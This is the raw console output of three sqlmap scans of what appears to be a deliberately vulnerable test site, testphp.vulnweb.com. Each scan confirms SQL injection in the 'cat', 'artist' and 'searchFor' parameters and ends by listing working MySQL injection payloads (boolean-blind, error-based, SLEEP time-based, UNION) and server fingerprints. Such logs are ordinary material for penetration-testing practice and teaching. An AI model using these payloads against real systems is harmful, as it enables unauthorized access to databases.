=== SQLMap Output: GET http://testphp.vulnweb.com/listproducts.php?cat=3 (get) ===
___
       __H__
 ___ ___[']_____ ___ ___  {1.9.11#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:15:53 /2026-02-21/

[23:15:53] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:15:53] [INFO] flushing session file
[23:15:53] [INFO] testing connection to the target URL
[23:15:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:15:54] [INFO] testing if the target URL content is stable
[23:15:54] [INFO] target URL content is stable
[23:15:54] [INFO] testing if GET parameter 'cat' is dynamic
[23:15:55] [WARNING] GET parameter 'cat' does not appear to be dynamic
[23:15:55] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
[23:15:56] [INFO] heuristic (XSS) test shows that GET parameter 'cat' might be vulnerable to cross-site scripting (XSS) attacks
[23:15:56] [INFO] testing for SQL injection on GET parameter 'cat'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[23:15:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:15:56] [WARNING] reflective value(s) found and filtering out
[23:15:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[23:16:00] [INFO] GET parameter 'cat' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="Our")
[23:16:00] [INFO] testing 'Generic inline queries'
[23:16:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:16:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:16:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:16:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:16:02] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:16:02] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[23:16:03] [INFO] GET parameter 'cat' is 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' injectable 
[23:16:03] [INFO] testing 'MySQL inline queries'
[23:16:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:16:03] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[23:16:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:16:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:16:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:16:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:16:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[23:16:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:16:19] [INFO] GET parameter 'cat' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:16:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:16:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:16:20] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:16:22] [INFO] target URL appears to have 11 columns in query
[23:16:23] [INFO] GET parameter 'cat' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'cat' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: cat=(SELECT (CASE WHEN (1059=1059) THEN 3 ELSE (SELECT 5914 UNION SELECT 7938) END))

    Type: error-based
    Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
    Payload: cat=3 OR GTID_SUBSET(CONCAT(0x716b716b71,(SELECT (ELT(5599=5599,1))),0x716a626b71),5599)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=3 AND (SELECT 5035 FROM (SELECT(SLEEP(5)))dkNx)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716b71,0x624d415a466e6f684c526b7a774e5470617a4f524f597a68777168587762456575646a4f5652696f,0x716a626b71),NULL-- -
---
[23:16:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[23:16:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 23:16:26 /2026-02-21/

=== SQLMap Output: GET http://testphp.vulnweb.com/artists.php?artist=2 (get) ===
___
       __H__
 ___ ___["]_____ ___ ___  {1.9.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:17:04 /2026-02-21/

[23:17:04] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:17:04] [INFO] flushing session file
[23:17:04] [INFO] testing connection to the target URL
[23:17:05] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:17:05] [INFO] testing if the target URL content is stable
[23:17:06] [INFO] target URL content is stable
[23:17:06] [INFO] testing if GET parameter 'artist' is dynamic
[23:17:06] [INFO] GET parameter 'artist' appears to be dynamic
[23:17:06] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')
[23:17:07] [INFO] heuristic (XSS) test shows that GET parameter 'artist' might be vulnerable to cross-site scripting (XSS) attacks
[23:17:07] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[23:17:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:17:07] [WARNING] reflective value(s) found and filtering out
[23:17:08] [INFO] GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="sem")
[23:17:08] [INFO] testing 'Generic inline queries'
[23:17:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:17:09] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:17:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:17:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:17:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:17:10] [INFO] GET parameter 'artist' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[23:17:10] [INFO] testing 'MySQL inline queries'
[23:17:10] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:17:10] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
[23:17:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:17:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:17:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:17:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:17:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[23:17:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:17:29] [INFO] GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:17:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:17:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:17:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:17:32] [INFO] target URL appears to have 3 columns in query
[23:17:34] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=2 AND 1734=1734

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: artist=2 AND GTID_SUBSET(CONCAT(0x7170627a71,(SELECT (ELT(7352=7352,1))),0x7176707a71),7352)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=2 AND (SELECT 9346 FROM (SELECT(SLEEP(5)))YYjw)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-6443 UNION ALL SELECT NULL,NULL,CONCAT(0x7170627a71,0x51754778536e6c504d61476553587a45646641696846614d594c67416c64644c724d4d684f746270,0x7176707a71)-- -
---
[23:17:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[23:17:37] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 23:17:37 /2026-02-21/

=== SQLMap Output: POST http://testphp.vulnweb.com/search.php?test=query (form-post) ===
___
       __H__
 ___ ___[']_____ ___ ___  {1.9.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:18:25 /2026-02-21/

[23:18:25] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:18:25] [INFO] flushing session file
[23:18:25] [INFO] testing connection to the target URL
[23:18:25] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:18:26] [INFO] testing if the target URL content is stable
[23:18:26] [INFO] target URL content is stable
[23:18:26] [INFO] testing if POST parameter 'searchFor' is dynamic
[23:18:26] [WARNING] POST parameter 'searchFor' does not appear to be dynamic
[23:18:27] [INFO] heuristic (basic) test shows that POST parameter 'searchFor' might be injectable (possible DBMS: 'MySQL')
[23:18:27] [INFO] heuristic (XSS) test shows that POST parameter 'searchFor' might be vulnerable to cross-site scripting (XSS) attacks
[23:18:27] [INFO] testing for SQL injection on POST parameter 'searchFor'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[23:18:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:18:27] [WARNING] reflective value(s) found and filtering out
[23:18:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[23:18:31] [INFO] testing 'Generic inline queries'
[23:18:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[23:18:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[23:19:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[23:19:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[23:19:42] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[23:20:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[23:20:37] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[23:21:05] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[23:21:28] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:21:42] [INFO] POST parameter 'searchFor' appears to be 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable (with --string="Our")
[23:21:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:21:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:21:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:21:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:21:43] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:21:43] [INFO] POST parameter 'searchFor' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[23:21:43] [INFO] testing 'MySQL inline queries'
[23:21:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:21:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:21:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:21:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:21:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:21:46] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[23:21:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:22:00] [INFO] POST parameter 'searchFor' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:22:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:22:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:22:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[23:22:22] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[23:22:29] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[23:22:36] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[23:22:44] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[23:22:50] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[23:22:56] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[23:23:03] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[23:23:09] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'searchFor' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 793 HTTP(s) requests:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(3871,CASE WHEN (3871=3871) THEN 3871 ELSE 0x3A END) AND 'jsCf'='jsCf

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x716a787a71,(SELECT (ELT(3866=3866,1))),0x71706b7171),3866) AND 'cAFN'='cAFN

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 4291 FROM (SELECT(SLEEP(5)))boeb) AND 'ovds'='ovds
---
[23:23:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[23:23:20] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 23:23:20 /2026-02-21/

